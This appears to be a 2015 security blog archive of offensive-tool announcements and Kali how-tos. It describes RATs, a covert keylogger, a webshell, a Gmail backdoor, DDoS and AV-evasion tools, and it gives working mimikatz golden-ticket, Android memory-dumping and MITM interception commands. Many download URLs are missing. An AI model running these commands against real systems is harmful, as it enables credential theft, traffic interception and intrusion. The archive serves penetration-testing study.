Dec 11, 2015

Howto: install and use bettercap in Kali 2.0

1. Install Ruby-Dev
# apt-get install ruby-dev libpcap-dev

2. Download source code bettercap
# git clone

3. Install bettercap
# cd bettercap
# gem build bettercap.gemspec
# gem install bettercap*.gem

4. Start monitor traffic and MITM
# bettercap -X -L -I eth0
-X => Sniffing
-L =>  Parse packets coming from/to the address of this computer
-I => Interface

5. Download Proxy module
#  git clone

6. Using bettercap + beef
# bettercap -X -L -I eth0 --proxy-module bettercap-proxy-modules/beefbox.rb

Nov 23, 2015

Tools: Stream Detector - Alternate Data Streams (ADS) Detector

NoVirusThanks Stream Detector is a useful utility which finds all hidden Alternate Data Streams (ADS) on NTFS drives. After finding the alternate data streams, you can extract these streams, delete the file, delete unwanted streams, or export the list of found streams to a log file. This program can also list multiple hidden streams and can properly detect alternate data streams on an actual folder\directory


Nov 18, 2015

Tools: MassBleed - MassBleed SSL Vulnerability Scanner

USAGE: sh [CIDR|IP] [single|port|subnet] [port] [proxy]
ABOUT: This script has four main functions with the ability to proxy all connections:
  1. To mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: sh
  2. To scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: sh port 8443)
  3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh single)
  4. To scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
PROXY USAGE EXAMPLES: (example: sh 0 0 proxy) (example: sh port 8443 proxy) (example: sh single 0 proxy) (example: sh 192.168.0. subnet 0 proxy)
  1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
  2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
  3. Poodle SSLv3 vulnerability (CVE-2014-3566)
REQUIREMENTS: Is the heartbleed POC present? Is the openssl CCS script present? Is unicornscan installed? Is nmap installed? Is sslscan installed?


Nov 16, 2015

Tools: Windows Remote Access Trojan (RAT)

Windows Remote Access Trojan (RAT) using .NET Sockets
Client-server binaries and source-code for controlling a remote machine behind a NAT with a command-line shell in Windows. Although the core provides support for communication with multiple RATs, the command-line interface used has limited capabilities distinguishing each one.
The RAT process executable does not hide itself from taskbar or task manager as it was developed for educational purposes only. Please do not use for any malicious purposes.
Contains the source code and the two binaries packaged using ILMerge.

  1. Start the server in a command-line acting as the RAT (Binaries\rat.exe) -> rat ip=[controller-ip-address] port=[controller-port-default-is-9999]
  2. Start the client in a command-line acting as the controller (Binaries\controller.exe) -> controller ip=[listen-ip-address] port=[listen-port-default-is-9999]
  3. Issue commands from the controller.exe interface

Tools: 0d1n - Web security tool to make fuzzing at HTTP inputs, made in C with libCurl

 0d1n is a tool for automating customized attacks against web applications.
*brute force passwords in auth forms
*diretory disclosure ( use PATH list to brute, and find HTTP status code )
*test list on input to find SQL Injection and XSS vulnerabilities
other things...


Tools: Bonesi - Simulate a HTTP GET BotNet DDoS Attack

 How does TCP Spoofing work?
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary, that all traffic from the target webserver is routed back to the host running BoNeSi
HTTP-Flooding attacks can not be simulated in the internet, because answers from the webserver must be routed back to the host running BoNeSi.

It can be used to test firewall systems, routing hardware, DDoS Mitigation Systems or webservers directly.

Tools: Sn1per – Automated Pentest Recon Scanner

Sn1per is an automated open source scanner that you can use during penetration testing. the tool allow to use some compilation of pentest utility such as the harvester , nmap and brute force against your target. some of the features are:
  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports
  • Automatically brute forces sub-domains and DNS info
  • Automatically runs targeted nmap scripts against open ports
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces all open services

Tools: Joomlavs - A black box, Ruby powered, Joomla vulnerability scanner

JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic finger printing and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.


Nov 7, 2015

Tools: SpiderFoot – Open Source Intelligence Automation Tool (OSINT)


There are three main areas where SpiderFoot can be useful:
  • If you are a pen-tester, SpiderFoot will automate the reconnaisance stage of the test, giving you a rich set of data to help you pin-point areas of focus for the test.
  • Understand what your network/organisation is openly exposing to the outside world. Such information in the wrong hands could be a significant risk.
  • SpiderFoot can also be used to gather threat intelligence about suspected malicious IPs you might be seeing in your logs or have obtained via threat intelligence data feeds.


SpiderFoot has plenty of features, including the following:
  • Utilises a lot of different data sources; over 40 so far and counting, including SHODAN, RIPE, Whois, PasteBin, Google, SANS and more.
  • Designed for maximum data extraction; every piece of data is passed on to modules that may be interested, so that they can extract valuable information. No piece of discovered data is saved from analysis.
  • Runs on Linux and Windows. And fully open-source so you can fork it on GitHub and do whatever you want with it.
  • Visualisations. Built-in JavaScript-based visualisations or export to GEXF/CSV for use in other tools, like Gephi for instance.
  • Web-based UI. No cumbersome CLI or Java to mess with. Easy to use, easy to navigate. Take a look through the gallery for screenshots.
  • Highly configurable. Almost every module is configurable so you can define the level of intrusiveness and functionality.
  • Modular. Each major piece of functionality is a module, written in Python. Feel free to write your own and submit them to be incorporated!
  • SQLite back-end. All scan results are stored in a local SQLite database, so you can play with your data to your heart’s content.
  • Simultaneous scans. Each footprint scan runs as its own thread, so you can perform footprinting of many different targets simultaneously.

Tools: Bluto - Recon, Subdomain Bruting, Zone Transfers

DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration
Author: Darryl Lane | Twitter: @darryllane101
The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.
Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines. It is configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however exsesive lookups will result in captchas (Bluto will warn you if any are identified).


Nov 2, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.


Tools: windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems

Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).
It is written in python and converted to an executable using pyinstaller so it can be easily uploaded and run (as opposed to unzipping python + other dependencies). It can run either as a normal user or as Administrator (obviously it does a better job when running as Administrator because it can read more files).
The latest version of the code is in the master branch.

Use Cases

Below is a high level description of common use cases. See also the Quick Start & Usage page.

Find Privesc Vectors (as Administrator)

When run with admin rights, windows-privesc-check has full read access to all secureable objects. This allows it to perform audits for escalation vectors such as:
  • Reconfiguring Windows Services
  • Replacing Service executables if they have weak file permissions
  • Replacing poorly protected .exe or .dll files in %ProgramFiles%
  • Tojaning the %PATH%
  • Maliciously modifying the registry (e.g. RunOnce)
  • Modifying programs on FAT file systems
  • Tampering with running processes
A great many of the privielges escalation vectors checked are simply checks for weak security descriptors on Windows securable objects.
A report is generated in HTML, TXT and XML format.

Find Privesc Vectors (as a Low-Privileged User)

An important design goal is that windows-privesc-check can perform as many checks as possible (above) without admin rights. This will make the tool useful to pentesters as well as auditors.
Clearly, low-privileged users are unable to see certain parts of the registry and file system. The tool is therefore inherently less able to identify security weaknesses when run as a low-privileged user.
As above, a report is generated in HTML, TXT and XML format.

Dump Raw Auditing Data

Windows-privesc-check can simply dump raw data that it would normally use to identify security weaknesses. This data can then analysed some other way - or simply stored as a snapshot of system security at the time of the audit.
Both human-readable (text) and machine readable (tab delimited) formats are supported.
Examples of data users are able to dump:


Oct 23, 2015

Howto: Install bkhive in Kali 2.0

1. Download bkhive from Debian Repository
# wget "" -O bkhive-1.1.1.tar.gz

3. Extract
# tar xzvf bkhive-1.1.1.tar.gz

4. Install libssl-dev
# apt-get install libssl-dev

5. Install it
# make
# make install

Howto: Install latest Recon-ng in Kali 2.0

1. Purge old recon-ng
# apt-get purge recon-ng

2. Got new one from source
# git clone

Oct 20, 2015

Tools: Gping - Ping, but with a graph

Ping, but with a graph


Tools: XVWA - Xtreme Vulnerable Web Application

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security.

XVWA is designed to understand following security issues.
  • SQL Injection – Error Based
  • SQL Injection – Blind
  • OS Command Injection
  • XPATH Injection
  • Unrestricted File Upload
  • Reflected Cross Site Scripting
  • Stored Cross Site Scripting
  • DOM Based Cross Site Scripting
  • Server Side Request Forgery (Cross Site Port Attacks)
  • File Inclusion
  • Session Issues
  • Insecure Direct Object Reference
  • Missing Functional Level Access Control
  • Cross Site Request Forgery (CSRF)
  • Cryptography
  • Unvalidated Redirect & Forwards
  • Server Side Template Injection


Tools: LogScape - Centralize Log and Log Searcher

Search, visualize and analyze log files and operational data


Sep 30, 2015

Tools: Windows Spy Keylogger

Windows Spy Keylogger is the free software to help you covertly monitor all activities on your computer.
  • Free Tool to Monitor Keystokes in stealth manner
  • Monitor both 32-bit & 64-bit applications
  • Automatically run at Startup
  • No need for administrator privileges
  • Settings dialog to change various options
  • Stores keyboard activities silently to a log file
  • Very easy to use with just a click of button
  • Displays current status of key logger at any time
  • Includes Installer for local installation & un-installation
How to Use?
'Windows Spy Keylogger' is very easy to use tool with its cool GUI interface.
Here are the simple steps,
  • Run 'Windows Spy Keylogger' on your system
  • It will show you the current status of Keylogger as seen in the screenshots below.
  • Now you can just click on button below to Start or Stop Keylogger
  • That's all :)

Sep 25, 2015

Tools: ARDT - Akamai Reflective DDoS Tool

Akamai Reflective DDoS Tool - Attack the origin host behind the Akamai Edge hosts and DDoS protection offered by Akamai services.


Tools: Tango - Set of scripts and Splunk apps for Honeypot

Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions. There are two scripts provided which facilitate the installation of the honeypots and/or Splunk Universal Forwarder. One of the scripts will install the Splunk Universal Forwarder and install the necessary input and output configuration files. The other script will install the Splunk Universal Forwarder along with the Cowrie honeypot required for the Tango Honeypot Intelligence app to work.


Sep 24, 2015

Tools: Powercat - A PowerShell version of netcat.

PowerCat is a PowerShell module. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts


Tools: php-malware-finder - Detect potentially malicious PHP files

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.
The following list of encoders/obfuscators/webshells are also detected:


Tools: Pupy - opensource RAT (Remote Administration Tool) written in Python

Pupy is an opensource RAT (Remote Administration Tool) written in Python. Pupy uses reflective dll injection and leaves no traces on disk.

Features :

  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc ( and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Sep 21, 2015

Tools: scanmem - memory scanner for Linux

scanmem is a debugging utility designed to isolate the address of an arbitrary variable in an executing process. scanmem simply needs to be told the pid of the process, and the value of the variable at several different times.
After several scans of the process, scanmem isolates the position of the variable and allows you to modify it's value.
GameConqueror is a GUI of scanmem and more than that, it provides flexible syntax for searching, multiple memory locking and a memory editor.


Sep 17, 2015

Tools: Android Vulnerability Test Suite

Android Vulnerability Test Suite - In the spirit of open data collection, and with the help of the community, let's take a pulse on the state of Android security. NowSecure presents an on-device app to test for recent device vulnerabilities.


Sep 9, 2015

Howto: Extract sensitive plaintext data from Android memory

1. Upload the file$ adb push gdbserver /sdcard

2. Enter a shell and become root
$ adb shell
$ su

3. Remount /system as read/write
$ mount -o rw,remount /system

4. Copy file to /system/xbin (or /system/bin)
$ cp /sdcard/gdbserver /system/xbin

5. Change permissions to ensure that it is executable
$ chmod 555 /system/xbin

6. Clean up
$ mount -o ro,remount /system
$ rm /sdcard/gdbserver

7. Download and compile gdb
$ wget
$ bunzip2 gdb-7.7.tar.bz2
$ tar xf gdb-7.7.tar
$ cd gdb-7.7/
$ ./configure --target=arm-linux-gnueabi
$ make

8. Find the keystore pid
$ ps | grep key
$ cd /proc/228

9. Find the heap
What we’ll normally find are is the code that makes up the process and its libraries and then a copy of the important bits of the process:
- heap   - memory assigned by the VM or by the kernel for data storage
- stack  - memory used during function calls etc.
 So above we can see that the heap runs from 0xb7712000(start of heap) – 0xb771f000(end of heap)

10. Start gdbserver on the process listening on a port on the device
$ gdbserver --attach :1234 228
1234 => any Port
228 => any PID

11. Use adb to forward the port on the device to a local port
$ adb forward tcp:1234 tcp:1234

This will now allow us to talk to the device on port 1234/tcp by connecting to 1234/tcp on the host device.

12. Use a third party program to forward the local port to the device where you will be running gdb
> Use program "Port Forwarding for Windows” to forward from my native OS to the virtual machine I run gdb on

13. Connect via gdb
$ ./gdb
$ gdb> target remote

14. Dump the memory
$ gdb> dump memory /tmp/heapout 0xb7712000 0xb771f000

15. Look for some strings that can be user, password
$ strings /tmp/heapout | more

Tools: USBDeview v2.45 - View all installed/connected USB devices on your system

USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more...
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.
You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

Using USBDeview

USBDeview doesn't require any installation process or additional DLL files. Just copy the executable file (USBDeview.exe) to any folder you like, and run it.
The main window of USBDeview displays all USB devices installed on your system. You can select one or more items, and then disconnect (unplug) them , uninstall them, or just save the information into text/xml/html file.
USBDeview Columns Description
  • Device Name: Specifies the device name. For some device, this column may display meaningless name, like "USB Device". If the device name is meaningless, try to look at the Description column.
  • Device Description: The description of the device.
  • Device Type: The device type, according to USB class code. For more information about USB classes: USB Class Codes.
  • Connected: Specifies whether the device is currently connected to your computer. If the device is connected, you can use the 'Disconnect Selected Devices' option (F9) to disconnect the device.
  • Safe To Unplug: Specifies whether it's safe to unplug the device from the USB plug without disconnecting it first. If the value of this column is false, and you want to unplug this device, you must first disconnect this device by using the 'Disconnect Selected Devices' option (F9) of USBDeview utility, or by using the 'Unplug or Eject Hardware' utility of Windows operating system.
  • Drive Letter: Specifies the drive letter of the USB device. This column is only relevant to USB flash memory devices and to USB CD/DVD drives. Be aware that USBDeview cannot detect drive letters of USB hard-disks.
  • Serial Number: Specifies the serial number of the device. This column is only relevant to mass storage devices (flash memory devices, CD/DVD drives, and USB hard-disks).
  • Created Date: Specifies the date/time that the device was installed. In most cases, this date/time value represents the time that you first plugged the device to the USB port. However, be aware that in some circumstances this value may be wrong. Also, On Windows 7, this value is initialized with the current date/time on every reboot.
  • Last Plug/Unplug Date: Specifies the last time that you plugged/unplugged the device. This date value is lost when you restart the computer.
  • VendorID/ProductID: Specifies the VendorID and ProductID of the device. For unofficial list of VendorID/ProductID, click here.
  • USB Class/Subclass/Protocol: Specifies the Class/Subclass/Protocol of the device according to USB specifications. For more information about USB classes: USB Class Codes.
  • Hub/Port: Specifies the hub number and port number that the device was plugged into. This value is empty for mass storage devices.
Notice: According to user reports, On some systems the 'Last Plug/Unplug Date' and the 'Created Date' values are initialized after reboot. This means that these columns may display the reboot time instead of the correct date/time.


Howto: use Metasploit in Kali2

1. Initial metasploit database (First time Only)
# systemctl start postgresql
# msfdb init
# msfconsole

2. Start msfdb + postgresql
# systemctl start postgresql
# msfdb start
# msfconsole

Tools: OWASP ZeroDay Cyber Research Shellcoder

OWASP ZeroDay Cyber Research Shellcoder [Generator] is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Linux under python 2.7.x.


Usage of shellcodes

Shellcodes are small codes in assembly which could be use as the payload in software exploiting. Other usages are in malwares, bypassing antiviruses, obfuscated codes and etc.

Why use OWASP ZSC?

According to other shellcode generators same as metasploit tools and etc, OWASP ZSC using new encodes and methods which antiviruses won't detect. OWASP ZSC encoderes are able to generate shellcodes withrandom encodes and that's lets you to get thousands new dynamic shellcodes with same job in just a second,that means you will not get a same code if you use random encodes with same commands, And that make OWASP ZSC one of the bests! otherwise it's gonna generate shellcodes for many operation systems in next versions.

Tools: Btproxy - Man in the Middle analysis tool for Bluetooth.


  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ
For a debian system, run

sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev


sudo python install


To run a simple MiTM or proxy on two devices, run

btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.


# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave mac address is typically the other peripherial device (smart watch, headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?

Well, you can look it up in the settings usually for a phone. The most robost way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:

hcitool scan
hcitool inq
To get a list of services on a device:

sdptool records <bt-address>


Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will lookup those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).

Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor. After the master connects, the proxied connection is complete.

Using only one adapter

This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.


Sep 8, 2015

Tools: b374k - PHP Webshell with handy features

This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser
Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach local file on server)
  • String conversion
  • All of that only in 1 file, no installation needed
  • Support PHP > 4.3.3 and PHP 5


Tools: Gcat – Python Backdoor Using Gmail For Command & Control


A stealthy Python based backdoor that uses Gmail as a command and control server


For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • a script that's used to enumerate and issue commands to available clients
  • the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile into an executable using Pyinstaller


Sep 7, 2015

Tools: Next-gen BurpSuite penetration testing tool: BurpKit

BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. As part of its rich feature set, BurpKit provides a bi-directional JavaScript bridge API which allows users to quickly create BurpSuite plugins which can interact directly with the DOM and Burp’s extender API at the same time. This permits BurpSuite plugin developers to run their web application testing logic directly within the DOM itself whilst taking advantage of BurpSuite’s other features as well!


Aug 26, 2015

Tools: Static Code Analysis for Smali

Dynamic program analysis will give you a pretty good overview of your applications activities and general behaviour. However sometimes you'll want to just analyze your application without running it. You'll want to have a look at its components, analyze how they interact and how data is tainted from one point to another. This is was the major factor driving the development of smalisca. There are indeed some good reasons for a static code analysis before the dynamic one. Before interacting with the application I like to know how the application has been build, if there is any API and generate all sort of call flow graphs. In fact graphs have been very important to me since they visualize things. Instead of jumping from file to file, from class to class, I just look at the graphs.
While graph building has been an important reason for me to code such a tool, smalisca has some other neat features you should read about.


Aug 25, 2015

Tools: dnSpy - .NET decompiler

dnSpy is a .NET assembly editor, decompiler, and debugger forked from ILSpy.


Aug 24, 2015

Howto: Install Metasploit 4.0.5 on Ubuntu 14.04

1. Install and update some software
$ apt-get update && apt-get upgrade -y
$ apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ruby-dev

2. Get the metasploit
$ git clone

3. Install ruby gem
$ cd metasploit-framework/
$ apt-get install ruby ruby-dev
$ gem install bundler

5. Install rvm
$ gpg --keyserver hkp:// --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
$ \curl -sSL | bash -s stable --ruby

6. Use Ruby 2.2.3
$ source /usr/local/rvm/scripts/rvm
$ rvm install ruby-2.2.3
$ rvm use --default  2.2.3

6. Install bundle
$ gem install bundle bundler
$ gem install ffi -v '1.9.8'
$ gem install nokogiri -v ''
$ gem install metasploit-concern -v '1.0.0'
$ bundle install

7. Done.

Aug 23, 2015

Tools: Exe2Image

A simple utility to convert EXE files to JPEG images and vice versa.


Howto: Install VMware Tools in Kali Linux 2

1. Update your app and repository list
$ apt-get update && apt-get upgrade -y

2. Install Linux kernel header
$ apt-get install -y linux-headers-$(uname -r)

3. Install VMWare tool
- mount by Click Install VMware Tools. from menu
- copy the file VMwareTools-9.9.3-2759765.tar.gz to your Kali
$ tar -xf VMwareTools-9.9.3-2759765.tar.gz
$ cd vmware-tools-distrib
$ perl -d

Aug 21, 2015

Tools: CrackMapExec - pentesting Windows/Active Directory tool

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!
The biggest improvements over the above tools are:
  • Pure Python script, no external tools required
  • Fully concurrent threading
  • Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
  • Opsec safe (no binaries are uploaded to dump clear-text credentials)
Requires the impacket, gevent and netaddr Python libraries


Tools: BinNavi - binary analysis IDE

BinNavi is a binary analysis IDE - an environment that allows users to inspect, navigate, edit, and annotate control-flow-graphs of disassembled code, do the same for the callgraph of the executable, collect and combine execution traces, and generally keep track of analysis results among a group of analysts.


CheatSheet: LFCS (Linux Foundation Certified System Admin)

Command-line Detail Command
Command-line Editing text files on the command line vim, nano

Editing text files on the command line cat, grep, tr, cut, awk, head, tail, echo
Filesystem & storage Archiving and compressing files and directories tar,gzip,xz,gunzip,bz2

Assembling partitions as LVM devices pvcreate,vgcreate,lvcreate,lvextend

Configuring swap partitions mkswap, swapon, swapoff

File attributes chmod, chattr, chown

Finding files on the filesystem find, grep

Formatting filesystems mkfs series

Mounting filesystems automatically at boot time /etc/fstab

Mounting networked filesystems mount in /etc/fstab and package of nfs-client

Partitioning storage devices fdisk

Troubleshooting filesystem issues fsck
Local system administration Creating backups cp, rsync

Creating local user groups useradd, adduser, groupadd, addgroup

Managing file permissions chmod, chattr, chown

Managing fstab entries /etc/fstab

Managing local users accounts usermod, passwd

Managing the startup process and related services /etc/rc.local, /etc/rc*.d

Managing user accounts usermod, passwd

Managing user account attributes usermod, passwd

Managing user processes /etc/security/limits.conf, ulimit

Restoring backed up data tar,gzip,xz,gunzip,bz2

Setting file permissions and ownership chmod, chattr, chown
Local Security Accessing the root account su, sudo

Using sudo to manage access to the root account sudo
Shell scripting Basic bash shell scripting if,else, expr, while, for,${#string},${name:0:n:},$0,$1,$2,$#,$*
Software management Installing software packages apt-get, dpkg, rpm, yum

Tools: Whonix - Anonymous OS

Whonix is an operating system focused on anonymity, privacy and security. It's based on the Tor anonymity network[1], Debian GNU/Linux[2] and security by isolation. DNS leaks are impossible, and not even malware with root privileges can find out the user's real IP.
Whonix consists of two parts: One solely runs Tor and acts as a gateway, which we call Whonix-Gateway. The other, which we call Whonix-Workstation, is on a completely isolated network. Only connections through Tor are possible.


Aug 18, 2015

Howto: Setup MiTM lab on wifi network By Hackers Online Club


Setting up a SNIFFLAB
Scripts to create your own MITM'ing, packet sniffing WiFi access point.

Firewall rules on DD-WRT router to send traffic to MITM proxy box

Make sure the network interface (vlan1 here) is correct.

iptables -t mangle -A PREROUTING -j ACCEPT -p tcp -m multiport --dports 80,443 -s $PROXYIP
iptables -t mangle -A PREROUTING -j MARK --set-mark 3 -p tcp -m multiport --dports 80,443
ip rule add fwmark 3 table 2
ip route add default via $PROXYIP dev vlan1 table 2

PCAP machine scripts


auto lo
iface lo inet loopback
iface eth0 inet manual
iface eth1 inet manual
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

auto bond0
iface bond0 inet dhcp
bond-mode 3
bond-miimon 100
slaves eth0 eth1

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev


Getting the network running correctly on boot


# Provides:
# Short-Description: Ensure WiFi as well as Ethernet interfaces are up
# Description:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Required-Start: $remote_fs $syslog
# Required-Stop: $remote_fs $syslog
sudo ifplugd eth0 --kill
sudo ifup wlan0
sudo ifup eth0
sudo ifup eth1
sudo ifconfig eth1 promisc
sudo ifconfig eth0 promisc
exit 0

Start capturing packets on startup -- create a sniffer service


start on runlevel [2345]
stop on runlevel [016]

cd /home/pi/snifflab
exec python -i bond0 -s 100 -t 1200
end script

MITM proxy service


start on filesystem

sudo iptables -A PREROUTING -t nat -i em1 -p tcp -m multiport --dports 80,443 -j REDIRECT --to-port 4567
echo "MITM Keys being logged here: $SSLKEYLOGFILE"
exec mitmdump -T --host --conf=/etc/mitmproxy/common.conf
end script

Script to backup pcaps to local machine


rsync -a "$remote_server":$pcap_dir $local_dir
scp "$remote_server":$keylogfile $local_dir

Tools: OWASP ZCR Shellcoder

OWASP ZCR Shellcoder is an open source software in python language which lets you generate customized shellcodes for listed operation systems. This software can be run on Windows/Linux&Unix/OSX and others OS under python 2.7.x.


Aug 16, 2015

Tools: Exploit Privilege Escalation in Mac OS X 10.10.5

xnu local privilege escalation via cve-2015-???? & cve-2015-???? for 10.10.5, 0day at the time | poc||gtfo


Howto: Install Java on Kali 2.0

1. Download java from

2. Unzip it
tar xzvf jdk-8u51-linux-x64.tar.gz

3. Move it to /opt
mv jdk1.8.0_51/ /opt/

4. Install the new path of java
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_51/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_51/bin/javac 1
update-alternatives --install /usr/lib/mozilla/plugins/ /opt/jdk1.8.0_51/jre/lib/amd64/ 1

Howto: Using Mimikatz on Windows 8.1 by Carnal0wnage


1. mimikatz # sekurlsa::logonpasswords
2. Dump Kerberos Ticket
mimikatz # sekurlsa::tickets /export
3. Get ticket current session
mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

4. Create Kerberos Ticket
mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi

mimikatz # kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42 /user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600 /renewmax:10080

Howto: Fix and use Armitage in Kali2


curl > armitage150813.tgz
tar xzf armitage150813.tgz
cd armitage
msfdb init 

Aug 13, 2015

Tools: Metasploit AV Evasion

Metasploit payload generator that avoids most Anti-Virus products.
Released as open source by NCC Group Plc -
Developed by Daniel Compton, daniel dot compton at nccgroup dot com


Aug 12, 2015

Tools: CredCrack - A fast and stealthy credential harvester

CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials in memory and in the clear without ever touching disk. Upon obtaining credentials, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!  CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory. Download Invoke-Mimikatz Here


Aug 11, 2015

Tools: pcap-burp - Pcap importer for Burp

This project provides a Burp Suite extension for importing and passively scanning Pcap/Pcapng files with Burp. It can be used in cases where a HTTP client does not support proxying but it would be useful to scan, inspect or replay the HTTP traffic using Burp.


Aug 10, 2015

Howto: create python to post Facebook

1. Create user in facebook

2. Create Facebook application (Advance Setup)

3. Setup name and Namespace

4. Got App ID, API Version, App Secret

5. Got the access token with choose permission what you want it can do.

6. Go to My App -> your application -> Status & Review -> New Submission -> Specific permission that you want it can do

7. Upgrade python-request module
# pip install --upgrade requests
# pip-2.7 install --upgrade requests

8. Use the code
# coding: utf-8

import facebook
import requests

